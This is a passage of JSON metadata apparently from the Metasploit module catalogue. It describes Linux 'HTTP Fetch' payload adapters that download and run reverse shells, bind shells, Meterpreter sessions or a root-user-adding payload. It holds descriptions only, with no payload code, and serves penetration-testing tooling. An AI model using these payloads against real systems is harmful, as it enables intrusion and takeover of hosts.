- "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-19 18:10:55 +0000", - "path": 
"/modules/payloads/adapters/cmd/linux/http/ppc64le.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/ppc64le/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/ppc64le", - "adapted_refname": "linux/ppc64le/meterpreter_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/http/x64/exec": { - "name": "HTTP Fetch, Linux Execute Command", - "fullname": "payload/cmd/linux/http/x64/exec", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "ricky", - "Geyslan G. Bem " - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nExecute an arbitrary command or just a /bin/sh shell", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 11:49:38 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/x64/exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x64", - "adapted_refname": "linux/x64/exec", - "staged": false - }, - "payload_cmd/linux/http/x64/meterpreter/bind_tcp": { - "name": "HTTP Fetch, Bind TCP Stager", - "fullname": "payload/cmd/linux/http/x64/meterpreter/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Brent Cook ", - "ricky" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nListen for a connection", - "references": [], - "platform": "Linux,Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - 
"targets": null, - "mod_time": "2023-05-25 11:49:38 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/x64/meterpreter/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x64", - "adapted_refname": "linux/x64/meterpreter/bind_tcp", - "staged": true, - "stage_refname": "linux/x64/meterpreter", - "stager_refname": "linux/x64/bind_tcp" - }, - "payload_cmd/linux/http/x64/meterpreter/reverse_sctp": { - "name": "HTTP Fetch, Reverse SCTP Stager", - "fullname": "payload/cmd/linux/http/x64/meterpreter/reverse_sctp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Brent Cook ", - "RageLtMan " - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to the attacker", - "references": [], - "platform": "Linux,Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 11:49:38 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/x64/meterpreter/reverse_sctp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x64", - "adapted_refname": "linux/x64/meterpreter/reverse_sctp", - "staged": true, - "stage_refname": "linux/x64/meterpreter", - "stager_refname": "linux/x64/reverse_sctp" - }, - "payload_cmd/linux/http/x64/meterpreter/reverse_tcp": { - "name": "HTTP Fetch, Reverse TCP Stager", - "fullname": "payload/cmd/linux/http/x64/meterpreter/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - 
"Brendan Watters", - "Brent Cook ", - "ricky", - "tkmru" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to the attacker", - "references": [], - "platform": "Linux,Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 11:49:38 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/x64/meterpreter/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x64", - "adapted_refname": "linux/x64/meterpreter/reverse_tcp", - "staged": true, - "stage_refname": "linux/x64/meterpreter", - "stager_refname": "linux/x64/reverse_tcp" - }, - "payload_cmd/linux/http/x64/meterpreter_reverse_http": { - "name": "HTTP Fetch", - "fullname": "payload/cmd/linux/http/x64/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 11:49:38 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/x64/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x64", - "adapted_refname": "linux/x64/meterpreter_reverse_http", - "staged": false - }, - "payload_cmd/linux/http/x64/meterpreter_reverse_https": { - "name": "HTTP Fetch", - 
"fullname": "payload/cmd/linux/http/x64/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 11:49:38 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/x64/meterpreter_reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x64", - "adapted_refname": "linux/x64/meterpreter_reverse_https", - "staged": false - }, - "payload_cmd/linux/http/x64/meterpreter_reverse_tcp": { - "name": "HTTP Fetch", - "fullname": "payload/cmd/linux/http/x64/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 11:49:38 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/x64/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x64", - "adapted_refname": "linux/x64/meterpreter_reverse_tcp", - "staged": false - }, - 
"payload_cmd/linux/http/x64/pingback_bind_tcp": { - "name": "HTTP Fetch, Linux x64 Pingback, Bind TCP Inline", - "fullname": "payload/cmd/linux/http/x64/pingback_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "bwatters-r7" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nAccept a connection from attacker and report UUID (Linux x64)", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 11:49:38 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/x64/pingback_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x64", - "adapted_refname": "linux/x64/pingback_bind_tcp", - "staged": false - }, - "payload_cmd/linux/http/x64/pingback_reverse_tcp": { - "name": "HTTP Fetch, Linux x64 Pingback, Reverse TCP Inline", - "fullname": "payload/cmd/linux/http/x64/pingback_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "bwatters-r7" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to attacker and report UUID (Linux x64)", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 11:49:38 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/x64/pingback_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - 
"payload_type": 8, - "adapter_refname": "cmd/linux/http/x64", - "adapted_refname": "linux/x64/pingback_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/http/x64/shell/bind_tcp": { - "name": "HTTP Fetch, Linux Command Shell, Bind TCP Stager", - "fullname": "payload/cmd/linux/http/x64/shell/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "ricky" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nSpawn a command shell (staged).\n\nListen for a connection", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 11:49:38 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/x64/shell/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x64", - "adapted_refname": "linux/x64/shell/bind_tcp", - "staged": true, - "stage_refname": "linux/x64/shell", - "stager_refname": "linux/x64/bind_tcp" - }, - "payload_cmd/linux/http/x64/shell/reverse_sctp": { - "name": "HTTP Fetch, Linux Command Shell, Reverse SCTP Stager", - "fullname": "payload/cmd/linux/http/x64/shell/reverse_sctp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "ricky", - "RageLtMan " - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nSpawn a command shell (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 11:49:38 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x64.rb", - 
"is_install_path": true, - "ref_name": "cmd/linux/http/x64/shell/reverse_sctp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x64", - "adapted_refname": "linux/x64/shell/reverse_sctp", - "staged": true, - "stage_refname": "linux/x64/shell", - "stager_refname": "linux/x64/reverse_sctp" - }, - "payload_cmd/linux/http/x64/shell/reverse_tcp": { - "name": "HTTP Fetch, Linux Command Shell, Reverse TCP Stager", - "fullname": "payload/cmd/linux/http/x64/shell/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "ricky", - "tkmru" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nSpawn a command shell (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 11:49:38 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/x64/shell/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x64", - "adapted_refname": "linux/x64/shell/reverse_tcp", - "staged": true, - "stage_refname": "linux/x64/shell", - "stager_refname": "linux/x64/reverse_tcp" - }, - "payload_cmd/linux/http/x64/shell_bind_ipv6_tcp": { - "name": "HTTP Fetch, Linux x64 Command Shell, Bind TCP Inline (IPv6)", - "fullname": "payload/cmd/linux/http/x64/shell_bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "epi " - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nListen 
for an IPv6 connection and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 11:49:38 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/x64/shell_bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x64", - "adapted_refname": "linux/x64/shell_bind_ipv6_tcp", - "staged": false - }, - "payload_cmd/linux/http/x64/shell_bind_tcp": { - "name": "HTTP Fetch, Linux Command Shell, Bind TCP Inline", - "fullname": "payload/cmd/linux/http/x64/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "ricky" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nListen for a connection and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 11:49:38 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/x64/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x64", - "adapted_refname": "linux/x64/shell_bind_tcp", - "staged": false - }, - "payload_cmd/linux/http/x64/shell_bind_tcp_random_port": { - "name": "HTTP Fetch, Linux Command Shell, Bind TCP Random Port Inline", - "fullname": "payload/cmd/linux/http/x64/shell_bind_tcp_random_port", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - 
"author": [ - "Brendan Watters", - "Geyslan G. Bem " - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\n\n Listen for a connection in a random port and spawn a command shell.\n Use nmap to discover the open port: 'nmap -sS target -p-'.", - "references": [ - "URL-https://github.com/geyslan/SLAE/blob/master/improvements/tiny_shell_bind_tcp_random_port_x86_64.asm" - ], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 11:49:38 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/x64/shell_bind_tcp_random_port", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x64", - "adapted_refname": "linux/x64/shell_bind_tcp_random_port", - "staged": false - }, - "payload_cmd/linux/http/x64/shell_find_port": { - "name": "HTTP Fetch, Linux Command Shell, Find Port Inline", - "fullname": "payload/cmd/linux/http/x64/shell_find_port", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "mak" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nSpawn a shell on an established connection", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 11:49:38 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/x64/shell_find_port", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x64", - "adapted_refname": 
"linux/x64/shell_find_port", - "staged": false - }, - "payload_cmd/linux/http/x64/shell_reverse_ipv6_tcp": { - "name": "HTTP Fetch, Linux x64 Command Shell, Reverse TCP Inline (IPv6)", - "fullname": "payload/cmd/linux/http/x64/shell_reverse_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "epi " - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to attacker and spawn a command shell over IPv6", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 11:49:38 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/x64/shell_reverse_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x64", - "adapted_refname": "linux/x64/shell_reverse_ipv6_tcp", - "staged": false - }, - "payload_cmd/linux/http/x64/shell_reverse_tcp": { - "name": "HTTP Fetch, Linux Command Shell, Reverse TCP Inline", - "fullname": "payload/cmd/linux/http/x64/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "ricky" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to attacker and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-05-25 11:49:38 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/x64/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - 
"notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x64", - "adapted_refname": "linux/x64/shell_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/http/x86/adduser": { - "name": "HTTP Fetch, Linux Add User", - "fullname": "payload/cmd/linux/http/x86/adduser", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "skape ", - "vlad902 ", - "spoonm " - ], - "description": "Fetch and execute a x86 payload from an HTTP server.\nCreate a new user with UID 0", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/x86/adduser", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x86", - "adapted_refname": "linux/x86/adduser", - "staged": false - }, - "payload_cmd/linux/http/x86/chmod": { - "name": "HTTP Fetch, Linux Chmod", - "fullname": "payload/cmd/linux/http/x86/chmod", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "kris katterjohn " - ], - "description": "Fetch and execute a x86 payload from an HTTP server.\nRuns chmod on specified file with specified mode", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/x86/chmod", - "check": false, - "post_auth": false, 
- "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x86", - "adapted_refname": "linux/x86/chmod", - "staged": false - }, - "payload_cmd/linux/http/x86/exec": { - "name": "HTTP Fetch, Linux Execute Command", - "fullname": "payload/cmd/linux/http/x86/exec", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "vlad902 ", - "Geyslan G. Bem " - ], - "description": "Fetch and execute a x86 payload from an HTTP server.\nExecute an arbitrary command or just a /bin/sh shell", - "references": [ - "URL-https://github.com/geyslan/SLAE/blob/master/4th.assignment/tiny_execve_sh.asm", - "URL-https://github.com/geyslan/SLAE/blob/master/improvements/x86_execve_dyn.asm" - ], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/x86/exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x86", - "adapted_refname": "linux/x86/exec", - "staged": false - }, - "payload_cmd/linux/http/x86/generic/debug_trap": { - "name": "HTTP Fetch, Generic x86 Debug Trap", - "fullname": "payload/cmd/linux/http/x86/generic/debug_trap", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "robert " - ], - "description": "Fetch and execute a x86 payload from an HTTP server.\nGenerate a debug trap in the target process", - "references": [], - "platform": "BSD,BSDi,Linux,OSX,Solaris,Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, 
- "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/x86/generic/debug_trap", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x86", - "adapted_refname": "generic/debug_trap", - "staged": false - }, - "payload_cmd/linux/http/x86/generic/tight_loop": { - "name": "HTTP Fetch, Generic x86 Tight Loop", - "fullname": "payload/cmd/linux/http/x86/generic/tight_loop", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "jduck " - ], - "description": "Fetch and execute a x86 payload from an HTTP server.\nGenerate a tight loop in the target process", - "references": [], - "platform": "BSD,BSDi,Linux,OSX,Solaris,Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/x86/generic/tight_loop", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x86", - "adapted_refname": "generic/tight_loop", - "staged": false - }, - "payload_cmd/linux/http/x86/meterpreter/bind_ipv6_tcp": { - "name": "HTTP Fetch, Bind IPv6 TCP Stager (Linux x86)", - "fullname": "payload/cmd/linux/http/x86/meterpreter/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "William Webb ", - "kris katterjohn ", - "egypt " - ], - "description": "Fetch and execute a 
x86 payload from an HTTP server.\nListen for an IPv6 connection (Linux x86)", - "references": [], - "platform": "Linux,Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/x86/meterpreter/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x86", - "adapted_refname": "linux/x86/meterpreter/bind_ipv6_tcp", - "staged": true, - "stage_refname": "linux/x86/meterpreter", - "stager_refname": "linux/x86/bind_ipv6_tcp" - }, - "payload_cmd/linux/http/x86/meterpreter/bind_ipv6_tcp_uuid": { - "name": "HTTP Fetch, Bind IPv6 TCP Stager with UUID Support (Linux x86)", - "fullname": "payload/cmd/linux/http/x86/meterpreter/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "William Webb ", - "kris katterjohn ", - "egypt ", - "OJ Reeves" - ], - "description": "Fetch and execute a x86 payload from an HTTP server.\nListen for an IPv6 connection with UUID Support (Linux x86)", - "references": [], - "platform": "Linux,Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/x86/meterpreter/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x86", - "adapted_refname": "linux/x86/meterpreter/bind_ipv6_tcp_uuid", - 
"staged": true, - "stage_refname": "linux/x86/meterpreter", - "stager_refname": "linux/x86/bind_ipv6_tcp_uuid" - }, - "payload_cmd/linux/http/x86/meterpreter/bind_nonx_tcp": { - "name": "HTTP Fetch, Bind TCP Stager", - "fullname": "payload/cmd/linux/http/x86/meterpreter/bind_nonx_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "William Webb ", - "skape " - ], - "description": "Fetch and execute a x86 payload from an HTTP server.\nListen for a connection", - "references": [], - "platform": "Linux,Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/x86/meterpreter/bind_nonx_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x86", - "adapted_refname": "linux/x86/meterpreter/bind_nonx_tcp", - "staged": true, - "stage_refname": "linux/x86/meterpreter", - "stager_refname": "linux/x86/bind_nonx_tcp" - }, - "payload_cmd/linux/http/x86/meterpreter/bind_tcp": { - "name": "HTTP Fetch, Bind TCP Stager (Linux x86)", - "fullname": "payload/cmd/linux/http/x86/meterpreter/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "William Webb ", - "skape ", - "egypt " - ], - "description": "Fetch and execute a x86 payload from an HTTP server.\nListen for a connection (Linux x86)", - "references": [], - "platform": "Linux,Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": 
"/modules/payloads/adapters/cmd/linux/http/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/x86/meterpreter/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x86", - "adapted_refname": "linux/x86/meterpreter/bind_tcp", - "staged": true, - "stage_refname": "linux/x86/meterpreter", - "stager_refname": "linux/x86/bind_tcp" - }, - "payload_cmd/linux/http/x86/meterpreter/bind_tcp_uuid": { - "name": "HTTP Fetch, Bind TCP Stager with UUID Support (Linux x86)", - "fullname": "payload/cmd/linux/http/x86/meterpreter/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "William Webb ", - "skape ", - "egypt ", - "OJ Reeves" - ], - "description": "Fetch and execute a x86 payload from an HTTP server.\nListen for a connection with UUID Support (Linux x86)", - "references": [], - "platform": "Linux,Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/x86/meterpreter/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x86", - "adapted_refname": "linux/x86/meterpreter/bind_tcp_uuid", - "staged": true, - "stage_refname": "linux/x86/meterpreter", - "stager_refname": "linux/x86/bind_tcp_uuid" - }, - "payload_cmd/linux/http/x86/meterpreter/find_tag": { - "name": "HTTP Fetch, Find Tag Stager", - "fullname": "payload/cmd/linux/http/x86/meterpreter/find_tag", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", 
